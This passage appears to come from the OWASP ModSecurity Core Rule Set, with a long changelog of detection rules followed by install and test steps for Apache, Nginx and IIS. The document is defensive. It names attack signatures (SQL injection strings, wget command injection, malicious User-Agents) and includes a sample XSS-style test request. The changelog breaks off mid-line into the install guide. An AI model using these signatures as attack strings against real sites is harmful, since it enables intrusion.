the WEAK SQL Injection signatures +* Added tag AppSensor/RE8 to rule ID 960018 + +Bug Fixes: + +* Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches + +* Fixed Session Hijacking rules to properly capture IP address network hashes. +* Added the multiMatch action to the SQLi rules +* Fixed a false negative logic flaw within the advanced_filter_converter.lua script +* Fixed missing : in id action in DoS ruleset. +* Updated rule ID 971150 signature to remove ; + +## Version 2.2.0 - 2011-05-26 + +Improvements: + +* Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2) + +* Created new INSTALL file outlining quick config setup +* Added a new rule regression testing framework to the /util directory +* Added new activated_rules directory which will allow users to place symlinks pointing + to files they want to run. This allows for easier Apache Include wild-carding +* Adding in new RULE_MATURITY and RULE_ACCURACY tags +* Adding in a check for X-Forwarded-For source IP when creating IP collection +* Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) + +* Added new AppSensor rules to experimental_dir + +* Added new Generic Malicious JS checks in outbound content +* Added experimental IP Forensic rules to gather Client hostname/whois info + +* Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules + +* Global collection in the 10 file now uses the Host Request Header as the collection key. + This allows for per-site global collections. +* Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities. + This includes both converted web rules from Emerging Threats (ET) and from SLR Team. +* Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB +* Added experimental rules for detecting Open Proxy Abuse + +* Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API + +* Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227) +* Added new SQLi detection rules (959070, 959071 and 959072) +* Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data + + +Bug Fixes: + +* Assigned IDs to all active SecRules/SecActions +* Removed rule inversion (!) from rule ID 960902 +* Fixed false negative issue in Response Splitting Rule +* Fixed false negative issue with @validateByteRange check +* Updated the TARGETS listing for rule ID 950908 +* Updated TX data for REQBODY processing +* Changed the pass action to block in the RFI rules in the 40 generic file +* Updated RFI regex to catch IP address usage in hostname + +* Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods. +* Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions. + They will now inherit the settings from the SecDefaultAction + +## Version 2.1.2 - 2011-02-17 + +Improvements: + +* Added experimental real-time application profiling ruleset. +* Added experimental Lua script for profiling the # of page scripts, iframes, etc.. + which will help to identify successful XSS attacks and planting of malware links. +* Added new CSRF detection rule which will trigger if a subsequent request comes too + quickly (need to use the Ignore Static Content rules). + +Bug Fixes: + +* Added missing " in the skipAfter SecAction in the CC Detection rule set + +## Version 2.1.1 - 2010-12-30 + +Bug Fixes: + +* Updated the 10 config conf file to add in pass action to User-Agent rule +* Updated the CSRF ruleset to conditionally do content injection - if the + csrf token was created by the session hijacking conf file +* Updated the session hijacking conf file to only enforce rules if a SessionID + Cookie was submitted +* Fixed macro expansion setvar bug in the restricted file extension rule +* Moved the comment spam data file into the optional_rules directory + +## Version 2.1.0 - 2010-12-29 + +Improvements: + +* Added Experimental Lua Converter script to normalize payloads. Based on + PHPIDS Converter code and it used with the advanced filters conf file. +* Changed the name of PHPIDS converted rules to Advanced Filters +* Added Ignore Static Content (Performance enhancement) rule set +* Added XML Enabler (Web Services) rule set which will parse XML data +* Added Authorized Vulnerability Scanning (AVS) Whitelist rule set +* Added Denial of Service (DoS) Protection rule set +* Added Slow HTTP DoS (Connection Consumption) Protection rule set +* Added Brute Force Attack Protection rule set +* Added Session Hijacking Detection rule set +* Added Username Tracking rule set +* Added Authentication Tracking rule set +* Added Anti-Virus Scanning of File Attachments rule set +* Added AV Scanning program to /util directory +* Added Credit Card Usage Tracking/Leakage Prevention rule set +* Added experimental CC Track/PAN Leakage Prevention rule set +* Added an experimental_rules directory to hold new BETA rules +* Moved the local exceptions conf file back into base_rules directory however + it has a ".example" extension to prevent overwriting customized versions + when upgrading +* Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to + the experimental_rules directory +* Adding the REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will + help to make collections a bit more unique + +## Version 2.0.10 - 2010-11-29 + +Improvements: + +* Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS + is running in traditional mode. + +Bug Fixes: + +* Moved all skipAfter actions in chained rules to chain starter SecRules + +* Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs + +## Version 2.0.9 - 2010-11-17 + +Improvements: + +* Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that + it will not overwrite existing config settings. Users should rename this file to activate + it. +* Traditional detection mode is now the current default +* Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode + by editing the modsecurity_crs_10_config.conf file +* Updated the disruptive actions in most rules to use "block" action instead of "pass". This + is to allow for the toggling between traditional vs. anomaly scoring modes. +* Removed logging actions from most rules so that it can be controlled from the SecDefaultAction + setting in the modsecurity_crs_10_config.conf file +* Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match + what is used in the PHPIDS rules. These still have the same factor of severity even though + the numbers themselves are smaller. +* Updated the 49 and 59 blocking rules to include the matched logdata +* Updated the TAG data to further classify attack/vuln categories. +* Updated the SQL Injection filters to detect more boolean logic attacks +* Moved some files to optional_rules directory (phpids, Emerging Threats rules) + +Bug Fixes: + +* Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote + +* Moved all skipAfter actions in chained rules to the rule starter line (must have ModSec v2.5.13 or higher) + +* Fixed restricted file extension bug with macro expansion + +* Updated the SQLI TX variable macro expansion data in the 49 and 60 files so that + it matches what is being set in the sql injection conf file +* Fixed typo in SQL Injection regexs - missing backslash for word boundary (b) + + +## Version 2.0.8 - 2010-08-27 + +Improvements: + +* Updated the PHPIDS filters +* Updated the SQL Injection filters to detect boolean attacks (1<2, foo == bar, etc..) +* Updated the SQL Injection filters to account for different quotes +* Added UTF-8 encoding validation support to the modsecurity_crs_10_config.conf file +* Added Rule ID 950109 to detect multiple URL encodings +* Added two experimental rules to detect anomalous use of special characters + +Bug Fixes: + +* Fixed Encoding Detection RegEx (950107 and 950108) +* Fixed rules-updater.pl script to better handle whitespace + +* Fixed missing pass action bug in modsecurity_crs_21_protocol_anomalies.conf + +* Fixed the anomaly scoring in the modsecurity_crs_41_phpids_filters.conf file + +* Updated XSS rule id 958001 to improve the .cookie regex to reduce false positives + + +## Version 2.0.7 - 2010-06-04 + +Improvements: + +* Added CSRF Protection Ruleset which will use Content Injection to add javascript to + specific outbound data and then validate the csrf token on subsequent requests. +* Added new Application Defect Ruleset which will identify/fix missing HTTPOnly cookie + flags +* Added Experimental XSS/Missing Output Escaping Ruleset which looks for user supplied + data being echoed back to user unchanged. +* Added rules-updater.pl script and configuration file to allow users to automatically + download CRS rules from the CRS rules repository. +* Added new SQLi keyword for ciel() and reverse() functions. +* Updated the PHPIDS filters + +Bug Fixes: + +* Fixed false positives for Request Header Name matching in the 30 file by + adding boundary characters. +* Added missing pass actions to @pmFromFile prequalifier rules +* Added backslash to SQLi regex + +* Fixed hard coded anomaly score in PHPIDS filter file + +* Fixed restricted_extension false positive by adding boundary characters + +## Version 2.0.6 - 2010-02-26 + +Bug Fixes: + +* Added missing transformation functions to SQLi rules. + +* Fixed duplicate rule IDs. + +* Fixed typo in @pmFromFile in the Comment SPAM rules + +* Added macro expansion to Restricted Headers rule + +* Fixed misspelled SecMarker + +* Fixed missing chain action in Content-Type header check + +* Update phpids filters to use pass action instead of block + +## Version 2.0.5 - 2010-02-01 + +Improvements: + +* Removed previous 10 config files as they may conflict with local customized Mod configs. +* Added a new 10 config file that allows the user to globally set TX variables to turn on/off + PARANOID_MODE inspection, set anomaly score levels and http policies. + Must have ModSecurity 2.5.12 to use the macro expansion in numeric operators. +* Added Rule Logic and Reference links to rules descriptions. +* Added Rule IDs to all rules. +* Added tag data mapping to new OWASP Top 10 and AppSensor Projects, WASC Threat Classification +* Removed Apache limit directives from the 23 file +* Added macro expansion to 23 file checks. +* Added @pmFromFile check to 35 bad robots file +* Added malicious UA strings to 35 bad robots check +* Created an experimental rules file +* Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection +* Removed TX inspections for generic attacks and reverted to standard ARGS inspection + +* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other + variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) +* Moved converted ET Snort rules to the /optional_rules directory +* Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the + request headers. +* Updated Inbound blocking conf file to use macro expansion from the 10 config file settings +* Added separate anomaly scores for inbound, outbound and total to be evaluated for blocking. +* Updated the regex logic in the (1=1) rule to factor in quotes and other logical operators. +* Updated the SPAMMER RBL check rules logic to only check once per IP/Day. +* Added new outbound malware link detection rules. +* Added PHP "call_user_func" to blacklist + Identified by SOGETI ESEC R&D + +Bug Fixes: + +* Removed Non-numeric Rule IDs + +* Updated the variable list on SQLi rules. +* Fixed outbound @pmFromFile action from allow to skipAfter to allow for outbound anomaly scoring + and blocking + +## Version 2.0.4 - 2009-11-30 + +Improvements: + +* Updated converted PHPIDS signatures () +* Updated PHPIDS rules logic to first search for payloads in ARGS and then if there is no match found + then search more generically in request_body|request_uri_raw +* Updated PHPIDS rules logic to only set TX variables and to not log. This allows for more clean + exceptions in the 48 file which can then expire/delete false positive TX matches and adjust the + anomaly scores. These rules will then inspect for any TX variables in phase:5 and create appropriate + alerts for any variable matches that exist. + +Bug Fixes: + +* Added Anomaly Score check to the 60 correlation file to recheck the anomaly score at the end of + phase:4 which would allow for blocking based on information leakage issues. + +## Version 2.0.3 - 2009-11-05 + +Improvements: + +* Updated converted PHPIDS signatures () +* Create a new PHPIDS Converter rules file () +* Added new rules to identify multipart/form-data bypass attempts +* Increased anomaly scoring (+100) for REQBODY_PROCESSOR_ERROR alerts + +Bug Fixes: + +* Added t:urlDecodeUni transformation function to phpids rules to fix both false positives/negatives + +* Added new variable locations to the phpids filters + +* Use of transformation functions can cause false negatives - added multiMatch action to phpids rules + +* Fixed multipart parsing evasion issues by adding strict parsing rules + +* Fixed typo in xss rules (missing |) + +* Fixed regex text in IE8 XSS filters (changed to lowercase) + + +## Version 2.0.2 - 2009-09-11 + +Improvements: + +* Added converted PHPIDS signatures () + + +Bug Fixes: + +* Rule 958297 - Fixed Comment SPAM UA false positive that triggered only on mozilla. + + +## Version 2.0.1 - 2009-08-07 + +Improvements: + +* Updated the transformation functions used in the XSS/SQLi rules to improve performance + + +* Updated the variable/target list in the XSS rules + + +* Added XSS Filters from IE8 + + +Bug Fixes: + +* Rule 958297 - Fixed unescaped double-quote issue in Comment SPAM UA rule. + + +## Version 2.0.0 - 2009-07-29 + +New Rules & Features: + +* Fine Grained Policy + The rules have been split to having one signature per rule instead of having + all signatures combined into one optimized regular expression. + This should allow you to modify/disable events based on specific patterns + instead of having to deal with the whole rule. +* Converted Snort Rules + Emerging Threat web attack rules have been converted. + +* Anomaly Scoring Mode Option + The rules have been updated to include anomaly scoring variables which allow + you to evaluate the score at the end of phase:2 and phase:5 and decide on what + logging and disruptive actions to take based on the score. +* Correlated Events + There are rules in phase:5 that will provide some correlation between inbound + events and outbound events and will provide a result of successful atttack or + attempted attack. +* Updated Severity Ratings + The severity ratings in the rules have been updated to the following: + * 0: Emergency - is generated from correlation where there is an inbound attack and + an outbound leakage. + * 1: Alert - is generated from correlation where there is an inbound attack and an + outbound application level error. + * 2: Critical - is the highest severity level possible without correlation. It is + normally generated by the web attack rules (40 level files). + * 3: Error - is generated mostly from outbound leakabe rules (50 level files). + * 4: Warning - is generated by malicious client rules (35 level files). + * 5: Notice - is generated by the Protocol policy and anomaly files. + * 6: Info - is generated by the search engine clients (55 marketing file). +* Updated Comment SPAM Protections + Updated rules to include RBL lookups and client fingerprinting concepts from + Bad Behavior () +* Creation of Global Collection + Automatically create a Global collection in the _10_ config file. Other rules + can then access it. +* Use of Block Action + Updated the rules to use the "block" action. This allows the Admin to globally + set the desired block action once with SecDefaultAction in the _10_ config file + rather than having to edit the disruptive actions in all of the rules or for + the need to have multiple versions of the rules (blocking vs. non-blocking). +* "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name." + +* Added new generic RFI detection rules. + +* "Possibly malicious iframe tag in output" (Rules 981001,981002) + Planting invisible iframes in a site can be used by attackers to point users + from the victim site to their malicious site. This is actually as if the + user was visiting the attacker's site himself, causing the user's browser to + process the content in the attacker's site. + +New Events: + +* Rule 960019 - Expect Header Not Allowed. +* Rule 960020 - Pragma Header Requires Cache-Control Header +* Rule 958290 - Invalid Character in Request - Browsers should not send the (#) character + as it is reserved for use as a fragment identifier within the html page. +* Rule 958291 - Range: field exists and begins with 0. +* Rule 958292 - Invalid Request Header Found. +* Rule 958293 - Lowercase Via Request Header Found. +* Rule 958294 - Common SPAM Proxies found in Via Request Header. +* Rule 958295 - Multiple/Conflicting Connection Header Data Found. +* Rule 958296 - Request Indicates a SPAM client accessed the Site. +* Rule 958297 - Common SPAM/Email Harvester crawler. +* Rule 958298 - Common SPAM/Email Harvester crawler + +Bug Fixes: + +* Rule 950107 - Split the rule into 2 separate rules to factor in the + Content-Type when inspecting the REQUEST_BODY variable. +* Rule 960017 - Bug fix for when having port in the host header. +* Rule 960014 - Bug fix to correlate the SERVER_NAME variable. +* Rule 950801 - Increased the logic so that the rule will only run if the web site + uses UTF-8 Encoding. +* Rules 999210,999211 - Bug fix to move ctl actions to last rule, add OPTIONS and + allow the IPv6 loopback address +* Rule 950117 - Updated the RFI logic to factor in both a trailing "?" in the ARG + and to identify offsite hosts by comparing the ARG URI to the Host + header. Due to this rule now being stronger, moved it from optional + tight security rule to _40_ generic attacks file. + +Other Fixes: + +* Added more HTTP Protocol violations to _20_ file. +* Set the SecDefaultAction in the _10_ config file to log/pass (This was the + default setting, however this sets it explicitly. +* Added SecResponseBodyLimitAction ProcessPartial to the _10_ config file. This + was added so that when running the SecRuleEngine in DetectionOnly mode, it will + not deny response bodies that go over the size restrictions. +* Changed SecServerSignature to "Apache/1.3.28" +* Fixed the use of SkipAfter and SecMarkers to make it consistent. Now have + BEGIN and END SecMarkers for rule groups to more accurately allow moving to + proper locations. +* Fixed the @pm/@pmFromFile pre-qualifier logic to allow for operator inversion. + This removes the need for some SecAction/SkipAfter rules. +* Updated rule formatting to easily show rule containers (SecMarkers, pre-qualifier + rules and chained rules). + +## Version 1.6.1 - 2008-04-22 + +* Fixed a bug where phases and transformations where not specified explicitly + in rules. The issue affected a significant number of rules, and we strongly + recommend to upgrade. + +## Version 1.6.0 - 2008-02-19 + +New Rulesets & Features: + +* 42 - Tight Security + This ruleset contains currently 2 rules which are considered highly prone + to FPs. They take care of Path Traversal attacks, and RFI attacks. This + ruleset is included in the optional_rulesets dir +* 42 - Comment Spam + Comment Spam is used by the spammers to increase their rating in search + engines by posting links to their site in other sites that allow posting + of comments and messages. The rules in this ruleset will work against that. + (Requires ModSecurity 2.5) +* Tags + A single type of attack is often detected by multiple rules. The new alert + classification tags solve this issue by providing an alternative alert type + indication and can serve for filtering and analysis of audit logs. + The classification tags are hierarchical with slashes separating levels. + Usually there are two levels with the top level describing the alert group + and the lower level denoting the alert type itself, for example: + WEB_ATTACK/SQL_INJECTION. + +False Positives Fixes: + +* Rule 960903 - Moved to phase 4 instead of 5 to avoid FPs +* Rule 950107 - Will look for invalid url decoding in variables that are not + automatically url decoded + +Additional rules logic: + +* Using the new "logdata" action for logging the matched signature in rules +* When logging an event once, init the collection only if the alert needs to log +* Using the new operator @pm as a qualifier before large rules to enhance + performance (Requires ModSecurity 2.5) +* SQL injection - A smarter regexp is used to detect 1=1,2=2,etc.. and not + only 1=1. (Thanks to Marc Stern for the idea) +* New XSS signatures - iframe & flash XSS + +## Version 1.5.1 - 2007-12-06 + +False Positives Fixes: + +* Protocol Anomalies (file 21) - exception for Apache SSL pinger (Request: GET /) + +New Events: + +* 960019 - Detect HTTP/0.9 Requests + HTTP/0.9 request are not common these days. This rule will log by default, + and block in the blocking version of file 21 + +Other Fixes: + +* File 40, Rules 950004,950005 - Repaired the correction for the double + url decoding problem +* File 55 contained empty regular expressions. Fixed. + +## Version 1.5 - 2007-11-23 + +New Rulesets: + +* 23 - Request Limits + "Judging by appearances". This rulesets contains rules blocking based on + the size of the request, for example, a request with too many arguments + will be denied. + +Default policy changes: + +* XML protection off by default +* BLOCKING dir renamed to optional_rules +* Ruleset 55 (marketing) is now optional (added to the optional_rules dir) +* Ruleset 21 - The exception for apache internal monitor will not log anymore + +New Events: + +* 960912 - Invalid request body + Malformed content will not be parsed by modsecurity, but still there might + be applications that will parse it, ignoring the errors. +* 960913 - Invalid Request + Will trigger a security event when request was rejected by apache with + code 400, without going through ModSecurity rules. + +Additional rules logic: + +* 950001 - New signature: delete from +* 950007 - New signature: waitfor delay + +False Positives Fixes: + +* 950006 - Will not be looking for /cc pattern in User-Agent header +* 950002 - "Internet Explorer" signature removed +* Double decoding bug used to cause FPs. Some of the parameters are already + url-decoded by apache. This caused FPs when the rule performed another + url-decoding transformation. The rules have been split so that parameters + already decoded by apache will not be decoded by the rules anymore. +* 960911 - Expression is much more permissive now +* 950801 - Commented out entirely. NOTE: If your system uses UTF8 encoding, + then you should uncomment this rule (in file 20) + +version 1.4.3 - 2007-07-21 + +New Events: + +* 950012 - HTTP Request Smuggling + For more info on this attack: + +* 960912 - Invalid request body + Malformed content will not be parsed by modsecurity, but still there might + be applications that will parse it, ignoring the errors. +* 960913 - Invalid Request + Will trigger a security event when request was rejected by apache with + code 400, without going through ModSecurity rules. + +False Positives Fixes: + +* 950107 - Will allow a % sign in the middle of a string as well +* 960911 - A more accurate expression based on the rfc: + +* 950015 - Will not look for http/ pattern in the request headers + +Additional rules logic: + +* Since Apache applies scope directives only after ModSecurity phase 1 + this directives cannot be used to exclude phase 1 rules. Therefore + we moved all inspection rules to phase 2. + +version 1.4 build 2 - 2007-05-17 + +New Feature: + +* Search for signatures in XML content + XML Content will be parsed and ispected for signatures + +New Events: + +* 950116 - Unicode Full/Half Width Abuse Attack Attempt + Full-width unicode can by used to bypass content inspection. Such encoding will be forbidden + +* 960911 - Invalid HTTP request line + Enforce request line to be valid, i.e.: ` ` +* 960904 - Request Missing Content-Type (when there is content) + When a request contains content, the content-type must be specified. If not, the content will not be inspected +* 970018 - IIS installed in default location (any drive) + Log once if IIS in installed in the /Inetpub directory (on any drive, not only C) +* 950019 - Email Injection + Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails + +Regular expressions fixes: + +* Further optimization of some regular expressions (using the non-greediness operator) + The non-greediness operator, , prevents excessive backtracking + +FP fixes: + +* Rule 950107 - Will allow a parameter to end in a % sign from now on + +version 1.4 - 2007-05-02 + +New Events: + +* 970021 - WebLogic information disclosure + Matching of `"JSP compile error"` in the response body, will trigger this rule, with severity 4 (Warning) +* 950015,950910,950911 - HTTP Response Splitting + Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: + +ModSecurity does not support compressed content at the moment. Thus, the following rules have been added: +* 960902 - Content-Encoding in request not supported + Any incoming compressed request will be denied +* 960903 - Content-Encoding in response not supported + An outgoing compressed response will be logged to alert, but ONLY ONCE. + +False Positives Fixes: + +* Removed <.exe>,<.shtml> from restricted extensions +* Will not be looking for SQL Injection signatures ``,`` in the Via request header +* Excluded Referer header from SQL injection, XSS and command injection rules +* Excluded X-OS-Prefs header from command injection rule +* Will be looking for command injection signatures in + REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. +* Allowing charset specification in the Content-Type + +Additional rules logic: + +* Corrected match of OPTIONS method in event 960015 +* Changed location for event 960014 (proxy access) to REQUEST_URI_RAW +* Moved all rules apart from method inspection from phase 1 to phase 2 - + This will enable viewing content if such a rule triggers as well as setting + exceptions using Apache scope tags. +* Added match for double quote in addition to single quote for `` signature (SQL Injection) +* Added 1=1 signature (SQL Injection) + +version 1.3.2 build 4 2007-01-17 + +Fixed apache 2.4 dummy requests exclusion +Added persistent PDF UXSS detection rule + +## Version 1.3.2 build 3 2007-01-10 + +Fixed regular expression in rule 960010 (file #30) to allow multipart form data +content + +## Version 1.3.2 - 2006-12-27 + +New events: + +* 960037 Directory is restricted by policy +* 960038 HTTP header is restricted by policy + +Regular expressions fixes: + +* Regular expressions with @ at end of beginning (for example "@import) +* Regular expressions with un-escaped "." +* Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) +* The command injection wget is not searched in the UA header as it has different meaning there. +* LDAP Fixed to reduce FPs: + * More accurate regular expressions + * high bit characters not accpeted between signature tokens. +* Do not detect + Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf + Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf + + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on Nginx +------------------- + 1. Compile ModSecurity into Nginx + 2. Ensure that ModSecurity is loading correctly by checking error.log + at start up for lines indicating ModSecurity is installed. An example + might appear as follows: + ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` + 3. The most common method of deploying ModSecurity we have seen is + to create a new folder underneath the Nginx directory (typically + /usr/local/nginx/conf/). Often this folder + is called 'owasp-modsecurity-crs'. Create this folder and cd into it. + 4. Download our release from https://coreruleset.org/installation/ + and unpack it into a new owasp-modsecurity-crs folder. + 5. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. See the + section entitled OWASP CRS Configuration for more detail. + 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 7. Nginx requires the configuration of a single ModSecurity + configuration file within the nginx.conf file using the + 'ModSecurityConfig' directive (when using ModSecurity 2.x). + Best practice is to set 'ModSecurityConfig' to a file from + which you will include your other ModSecurity configuration + files. In this example we will use: + ```ModSecurityConfig modsec_includes.conf;``` + 7. Within modsec_includes.conf create your includes to the + CRS folder similar to as follows (The modsecurity.conf file from the + ModSecurity installation is included in this example): + ``` + include modsecurity.conf + include owasp-modsecurity-crs/crs-setup.conf + include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf + include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf + include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf + include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf + include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf + include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf + include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf + include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf + include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf + include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf + include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf + include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf + include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf + include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf + include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf + include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf + include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf + include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf + include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf + include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf + ``` + 8. Restart web server and ensure it starts without errors + 9. Make sure your web sites are still running fine. + 10. Proceed to the section "Testing the Installation" below. + +Installing on IIS +----------------- + The IIS installer comes with an optional version of CRS built in. + To upgrade or install this after the fact follow the following + steps. + 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" + 2. Download our release from https://coreruleset.org/installation/ + and unpack it into the current folder. + 3. Move the crs-setup.conf.example file to crs-setup.conf. + Please take this time to go through this + file and customize the settings for your local environment. Failure to + do so may result in false negatives and false positives. See the + section entitled OWASP CRS Configuration for more detail. + 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and + rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the + '.example' extension. This will allow you to add exceptions without updates + overwriting them in the future. + 5. Navigate back to the 'ModSecurity IIS' folder and modify the + 'modsecurity_iis' to include the following: + ``` + include owasp-modsecurity-crs/crs-setup.conf + include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf + include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf + include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf + include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf + include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf + include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf + include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf + include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf + include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf + include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf + include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf + include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf + include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf + include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf + include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf + include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf + include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf + include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf + include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf + include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf + include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf + ``` + 6. Restart web server and ensure it starts without errors + 7. Make sure your web sites are still running fine. + 8. Proceed to the section "Testing the Installation" below. + +Testing the Installation +======================== + To test your installation you should be able to use any number + of attacks. A typical request which should trigger CRS would be + ```http://localhost/?param=">``` + Upon sending this request you should see events reported in the + error log (nginx apache) or the event viewer (IIS). + + If have not changed the defaults with regards to anomaly scoring, + blocking and sampling percentage, then this request should have + been blocked and access forbidden. Likewise if you have configured + ModSecurity debug logging and/or audit logging this event should + log to these locations as well. + +OWASP CRS Configuration +======================= + The crs-setup.conf file includes management rules + and directives that can control important CRS functions. + The crs-setup.conf file comes with extensive comments. + This section here brings only the essential parts. + + By default we do not include settings within the crs-setup.conf + that configure ModSecurity itself. Instead those configuration + settings are set during the installation of ModSecurity proper. + An example for such such a + configuration file is available via the ModSecurity project + (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). + Be aware the crs-setup.conf file DOES specify + configuration directives such as SecDefaultAction. The default + is the anomaly scoring mode with the appropriate + SecDefaultAction as defined in the crs-setup.conf. + Alternative configuration modes are supported and explained + in crs-setup.conf. + + The default anomaly/correlation mode establishes an incoming + anomaly score threshold of 5 and an outgoing anomaly score + threshold of 4. The default installation has been tuned to + reduce false positives in a way that will allow most requests + to pass in this 